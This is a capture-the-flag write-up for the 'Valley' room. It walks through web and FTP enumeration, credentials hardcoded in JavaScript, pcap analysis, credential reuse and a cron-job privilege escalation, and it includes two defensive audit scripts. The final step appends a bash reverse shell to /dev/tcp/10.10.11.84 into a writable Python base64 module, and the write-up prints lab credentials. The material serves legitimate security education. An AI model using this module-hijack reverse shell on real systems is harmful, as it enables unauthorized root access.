Valley CTF
HTTP and FTP Enumeration - Wireshark Analysis - Lateral Move - CronJob PrivEsc
Scanning
Starting off with the nmap scan

SSH doesn't seem to be vulnerable on its own - we need valid credentials to log in.
We need to enumerate the HTTP port by finding some hidden directories.
If we find valid credentials, we can log on to FTP for further enumeration.
Enumeration and Foothold
On checking the website hosted on the IP, we get two endpoints: gallery and pricing.
Visiting the gallery endpoint and clicking on an image redirects to the /static endpoint with the index of the image appended to it !
Let's find some hidden files on the website under the /static endpoint.

/00 looks interesting - on visiting it:
dev notes from valleyDev:
-add wedding photo examples
-redo the editing on #4
-remove /dev1243224123123
-check for SIEM alerts
We found another directory, /dev1243224123123 - let's visit that.

Tried all the default credentials and brute-forcing for potential credentials, but it was of no use.
Viewing the page source revealed an interesting .js file, dev.js:
if (username === "siemDev" && password === "california") {
  window.location.href = "/dev1243224123123/devNotes37370.txt";
} else {
  loginErrorMsg.style.opacity = 1;
}
Valid credentials are embedded in the JS file in plain text - logging in with them gives us another note:
dev notes for ftp server:
-stop reusing credentials
-check for any vulnerabilies
-stay up to date on patching
-change ftp port to normal port
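The root cause of this foothold is a credential comparison that ships to every visitor's browser. As an added example (not code from the original writeup or the room), here is a small scan that flags credential-like literals in JavaScript before it is deployed. The JavaScript it scans is a constructed stand-in modelled on the dev.js snippet above; the identifier list in CRED_IDENTIFIERS is an assumption and should be extended for a real code base.

```python
"""Scan client-side JavaScript for credential literals.

Added example for this writeup, not code from the original post or the room.
SAMPLE_JS is a constructed stand-in modelled on the quoted dev.js snippet;
the identifier list is an assumption, not an exhaustive rule set.
"""
import re
import sys

# Constructed sample: a login check shipped to the browser, like the one found on the target.
SAMPLE_JS = """
const loginErrorMsg = document.getElementById("login-error-msg");
function validate(username, password) {
  if (username === "siemDev" && password === "california") {
    window.location.href = "/dev1243224123123/devNotes37370.txt";
  } else {
    loginErrorMsg.style.opacity = 1;
  }
}
"""

# Identifiers that usually hold secrets. Longer names come first so that
# "password" is not reported as "pass" and "username" not as "user".
CRED_IDENTIFIERS = r"(?:password|passwd|pass|pwd|secret|token|api[_-]?key|username|user)"

PATTERNS = [
    # comparison against a literal: password === "literal", user == 'literal'
    re.compile(rf"\b({CRED_IDENTIFIERS})\s*===?\s*([\"'])(.*?)\2", re.IGNORECASE),
    # assignment or object key: password = "literal", apiKey: 'literal'
    re.compile(rf"\b({CRED_IDENTIFIERS})\s*[:=]\s*([\"'])(.*?)\2", re.IGNORECASE),
]


def find_hardcoded_credentials(source):
    """Return (line_number, identifier, literal) for each credential-like literal in source."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for pattern in PATTERNS:
            for match in pattern.finditer(line):
                ident, _quote, value = match.groups()
                findings.append((line_no, ident, value))
    return findings


def mask(value, keep=2):
    """Mask a literal for reporting so the report itself does not leak the secret."""
    return value[:keep] + "*" * max(len(value) - keep, 0)


def report(source, name="<stdin>"):
    """Format findings one per line; returns the list of report lines."""
    lines = []
    for line_no, ident, value in find_hardcoded_credentials(source):
        lines.append(f"{name}:{line_no}: {ident} compared/assigned to literal {mask(value)!r}")
    return lines


if __name__ == "__main__":
    # Usage: python3 scan_js_creds.py [file.js ...]; with no arguments the constructed sample is scanned.
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            with open(path, encoding="utf-8", errors="replace") as fh:
                print("\n".join(report(fh.read(), path)))
    else:
        print("\n".join(report(SAMPLE_JS, "sample.js")))
```

The regexes are deliberately simple (a comparison or assignment of a quoted literal to a credential-named identifier); the point is that such a check run in CI would have caught the dev.js pattern, and the report masks the literal so the finding itself does not spread the secret further.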
Let's reuse the credentials to connect to the FTP server and continue our enumeration.

Cool, we have some .pcapng files - let's examine them with Wireshark and see how the data travels.
siemFTP and siemHTTP1 didn't have anything useful, but siemHTTP2 had a POST request to the index.html endpoint - which means there is a chance that credentials were passed in plain text.

Let's SSH into the machine, get a shell and grab user.txt.
Lateral Movement
We find another executable file called valleyAuthenticator - let's transfer the file and examine it using strings.

valley:liberty123
Let's SSH again with the above credentials, this time as the valley user !
Privilege Escalation
If we examine the /etc/crontab file, we see a Python file, photosEncrypt.py, which uses the base64 Python module.

The Python file basically just encrypts the photos using the base64 module and outputs them - and it runs as root.
Since it imports the base64 module file, what if we could append our reverse shell to that module? Do we have write permissions?
I checked the permissions on the file /usr/lib/python3.8/base64.py: it is owned by root and the ValleyAdmin group - and the user valley is a member of the ValleyAdmin group !
Another way to find this:
find / -writable 2>/dev/null | grep "python"
/usr/lib/python3.8
/usr/lib/python3.8/base64.py
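The condition abused here is a root cron job whose interpreter loads modules from a group-writable directory. As an added example (not code from the original writeup or the room), the audit below automates the manual check just described: for every root job in /etc/crontab that runs a Python script, it verifies that the script and each module directory (and the .py files in it) are root-owned and neither group- nor world-writable. The crontab text and file modes in the offline demo are constructed and modelled on the base64.py finding; the script path /opt/demo/photosEncrypt.py and gid 1001 (standing in for ValleyAdmin) are placeholders.

```python
"""Audit root cron jobs that run Python for code paths a non-root user can write.

Added example for this writeup, not code from the original post or the room.
DEMO_CRONTAB and DEMO_FS are constructed, modelled on the base64.py finding.
"""
import os
import re
import stat
import sys
from dataclasses import dataclass

# A five-field schedule or an @reboot-style keyword, then the user and the command.
CRON_LINE = re.compile(r"^\s*(?P<schedule>@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<command>.+)$")
# "python", "python3", "/usr/bin/python3.8" ... followed by a script path.
PYTHON_INVOCATION = re.compile(r"(?:^|\s)(?P<interp>\S*python[0-9.]*)\s+(?P<script>\S+)")


@dataclass
class Finding:
    path: str
    reason: str


def parse_system_crontab(text):
    """Return (user, command) for each job line in /etc/crontab format."""
    jobs = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue  # blank, comment, or VAR=value line
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("command").strip()))
    return jobs


def unsafe_mode(st):
    """Reason a root-run job could be influenced through this file, or None if it looks safe."""
    if st.st_uid != 0:
        return f"owned by uid {st.st_uid}, not root"
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return f"group-writable by gid {st.st_gid}"
    return None


def check_path(path, stat_fn=os.stat, listdir_fn=os.listdir):
    """Check one script or module directory; for a directory, also check the .py files in it."""
    try:
        st = stat_fn(path)
    except OSError as exc:
        return [Finding(path, f"cannot stat: {exc}")]
    findings = []
    reason = unsafe_mode(st)
    if reason:
        findings.append(Finding(path, reason))
    if stat.S_ISDIR(st.st_mode):
        for name in listdir_fn(path):
            child = os.path.join(path, name)
            try:
                child_reason = unsafe_mode(stat_fn(child)) if name.endswith(".py") else None
            except OSError:
                continue
            if child_reason:
                findings.append(Finding(child, child_reason))
    return findings


def audit_root_python_jobs(crontab_text, module_dirs, stat_fn=os.stat, listdir_fn=os.listdir):
    """For every root job that runs a Python script, check the script and the module directories."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        m = PYTHON_INVOCATION.search(command) if user == "root" else None
        if m:
            for path in [m.group("script"), *module_dirs]:
                findings.extend(check_path(path, stat_fn, listdir_fn))
    return findings


# ---- offline demo on constructed data ----
class FakeStat:
    """Minimal stand-in for os.stat_result (constructed for the demo)."""
    def __init__(self, mode, uid, gid):
        self.st_mode, self.st_uid, self.st_gid = mode, uid, gid


DEMO_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
1  *    * * *   root    python3 /opt/demo/photosEncrypt.py
*/5 *   * * *   valley  python3 /home/valley/tidy.py
"""
# Constructed modes: gid 1001 stands in for the ValleyAdmin group from the writeup.
DEMO_FS = {
    "/opt/demo/photosEncrypt.py": FakeStat(stat.S_IFREG | 0o755, 0, 0),
    "/usr/lib/python3.8": FakeStat(stat.S_IFDIR | 0o775, 0, 1001),
    "/usr/lib/python3.8/base64.py": FakeStat(stat.S_IFREG | 0o664, 0, 1001),
    "/usr/lib/python3.8/os.py": FakeStat(stat.S_IFREG | 0o644, 0, 0),
}


def demo_stat(path):
    try:
        return DEMO_FS[path]
    except KeyError:
        raise FileNotFoundError(path) from None


def demo_listdir(path):
    prefix = path.rstrip("/") + "/"
    return [p[len(prefix):] for p in DEMO_FS if p.startswith(prefix) and "/" not in p[len(prefix):]]


def demo():
    """Run the audit against the constructed crontab and filesystem."""
    return audit_root_python_jobs(DEMO_CRONTAB, ["/usr/lib/python3.8"], demo_stat, demo_listdir)


if __name__ == "__main__":
    # Live use: python3 audit_cron.py /etc/crontab /usr/lib/python3.8 [more module dirs]
    results = audit_root_python_jobs(open(sys.argv[1]).read(), sys.argv[2:]) if len(sys.argv) > 1 else demo()
    for f in results:
        print(f"{f.path}: {f.reason}")
```

On the demo data the audit reports both the module directory and base64.py as group-writable by gid 1001, which is exactly the misconfiguration the writeup exploits; the fix on the defender's side is to restore root:root ownership and 0644/0755 modes on the interpreter's library tree, and to keep the module path of root cron jobs out of any group that ordinary users belong to.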
Let's append our reverse shell to this file and meanwhile start a listener:
$ cat >> /usr/lib/python3.8/base64.py
import re
import struct
import binascii
import os
os.system('/bin/bash -c \'bash -i >& /dev/tcp/10.10.11.84/4444 0>&1\'')
